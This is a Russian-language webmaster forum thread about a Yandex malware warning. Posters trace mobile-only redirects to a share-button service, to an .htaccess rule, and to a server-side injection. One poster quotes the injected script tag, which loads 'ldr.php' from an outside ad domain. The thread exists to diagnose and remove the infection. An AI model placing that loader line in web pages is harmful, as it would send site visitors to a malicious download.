Яндекс пишет - Вирус на сайте

Источником заражения являются js-скрипты сервиса http://odnaknopka.ru/ , которые находятся на Вашем сайте.

При обращении к odnaknopka.ru/

ok2.js с User-Agent мобильного устройства, происходит автоматическое перенаправление посетителей на вредоносные цели.

Советую Вам обратиться к владельцам данного сервиса за комментариями относительно присутствия вредоносного кода для пользователей мобильных устройств.

Платон Щукин.

Была история с сообщением о вредоносном коде на моем сайте. Долго не мог найти причину, так как сайт был простой на кандидат цмс без админки, и разместить там что-то вредоносное очень трудно. Оказалось в файле .htaccess был прописан редирект для мобильных устройств на андроиде. Т.е. устройства на андроиде сразу были перенаправлены куды требовалось. Когда вычистил это дело, проблема исчезла.. на некоторое время. Оказалось, что в корневике лежал архив с прогой и кейгеном с ним (забыл удалить 100 лет назад). И вот после удаления этого архива стало все в полном порядке. Может поможет кому...

http://habrahabr.ru/post/185784/

Пост по теме.

"Сотрудники Яндекса предупреждают о некорректной работе сервиса odnaknopka.ru"

Подобная проблема и у меня (четыре раза за месяц). Грешил на яндекс, но расскажу свой метод решения этой проблемы.

Симптомы:

Заходим на сайт с устройства на Android, нас перебрасывает на сайт с предложением обновить какую-нибудь вещь. Заходим еще раз - грузится наш сайт. Если поменять ip, снова предложит "обновить" (установить вирус).

Диагноз от хостера:

"Проверьте htaccess, там скорей всего есть редирект. Обновите CMS. "

"Сервера не ломают, чтобы распростраянть вирус через пользователей. У нас все постоянно проверяется. Ищите у себя."

Действуем:

htaccess чист:

Options All -Indexes

<Files .htaccess>

order allow,deny

deny from all

</Files>

php_flag display_errors off

Ставим плагин для хрома(User Agent Switcher) на компе, чтобы выдать себя за андроид. Выключаем-включаем интеренет (меняется ip). Заходим на сайт видим редирект. Значит вирус поверил, что мы с андроида.

Популярной cms нет, движок написан ручками с нуля.

Просматриваем код страницы после нормальной загрузки (повторной). Все как обычно. Меняем ip. Обновляем страницу с исходным кодом и видим:

<script type="text/javascript" src="http://ad.energyoffsol.biz/ldr.php?21717218452"></script>

прям перед </head>

Благо есть тестовый домен на том же ip, что и зараженный. Заливаем туда index.php, htaccess, папку с js-скриптами с зараженного компа. Тестим (как было написано выше) - редирект :(

Удаляем все файлы из паки с js-скриптами. Тестируем - редирект :(

Удаляем все html-теги разметки, ссылки на css. Оставляем <html><head><title></title><пару ссылок на удаленные скрипты в папке js></head><body>111</body></html>. Тестирум - редирект(

Убираем половину тегов скрипт, а в остальных удаляем начало ("<sript"). Тестирум - редирект( Меняем ip, смотрим код - скрипт с редиректом (выше указанный) появился.

Удаляем все теги <script> (неработающие) - редиректа нет. Значит парсит по тегам <script>, даже битым.

Показываем хостеру одинокие .htaccess, index.php (без php и js), пустую папку "js" и спрашиваем какого лешего происходит редирект, если "на сервере вируса нет".

Название хостинга, говорить не буду. Посмотрим как оперативно они решат проблему.

mad4sys, очень похожая проблема. Можно попросить название хостинга в личку?

Заменил на кнопки от яндекса http://habrahabr.ru/post/182430/ . Может кому-то тоже нужно.

mad4sys, повесить сайт из одной статической страницы и проверить, есть ли на нем редирект, если есть, тыкать хостера в это. если нет - искать дальше в коде

И мине если можно, а лучше всем сказать! Кому надо тот прочитает.